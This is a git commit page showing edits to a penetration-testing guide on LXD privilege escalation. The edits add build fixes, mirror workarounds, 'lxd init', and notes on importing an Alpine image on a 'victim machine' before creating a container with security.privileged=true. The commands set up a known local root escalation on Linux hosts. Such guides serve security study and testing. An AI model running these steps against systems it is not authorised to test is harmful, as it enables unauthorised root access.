Update lxd-privilege-escalation.md
This commit is contained in:
parent
cbbce1ada1
commit
08797689fd
@ -24,6 +24,8 @@ cd $HOME/ContainerImages/alpine/
|
|||||||
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
|
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
|
||||||
#Create the container
|
#Create the container
|
||||||
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml
|
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml
|
||||||
|
|
||||||
|
# If that fails, run it adding -o image.release=3.8 at the end.
|
||||||
```
|
```
|
||||||
|
|
||||||
Then, upload to the vulnerable server the files **lxd.tar.xz** and **rootfs.squashfs**
|
Then, upload to the vulnerable server the files **lxd.tar.xz** and **rootfs.squashfs**
|
||||||
@ -68,12 +70,14 @@ ERROR: unsatisfiable constraints:
|
|||||||
Failed to install rootfs
|
Failed to install rootfs
|
||||||
|
|
||||||
# Maybe the error is due to mirror sites but it will create a rootfs directory in same folder i.e "lxd-alpine-builder" .
|
# Maybe the error is due to mirror sites but it will create a rootfs directory in same folder i.e "lxd-alpine-builder" .
|
||||||
1.) Goto - cd/rootfs/usr/share/alpine-mirrors/Mirrors.txt
|
1.) Edit the file rootfs/usr/share/alpine-mirrors/Mirrors.txt deleting all the entries but the first one, do the same with mirrors.yaml.
|
||||||
2.) Open that .txt file with any editor and remove all the mirror sites except first one, then save it there only.
|
2.) Again run - sudo ./build-alpine -a i686
|
||||||
3.) Again run - sudo ./build-alpine -a i686
|
|
||||||
|
|
||||||
# import the image
|
# import the image
|
||||||
lxc image import ./alpine.tar.gz --alias myimage
|
lxc image import ./alpine.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on the victim machine, or it might fail.
|
||||||
|
|
||||||
|
# before running the image, start and configure the lxd storage pool as default
|
||||||
|
lxd init
|
||||||
|
|
||||||
# run the image
|
# run the image
|
||||||
lxc init myimage mycontainer -c security.privileged=true
|
lxc init myimage mycontainer -c security.privileged=true
|
||||||
|
Loading…
Reference in New Issue
Block a user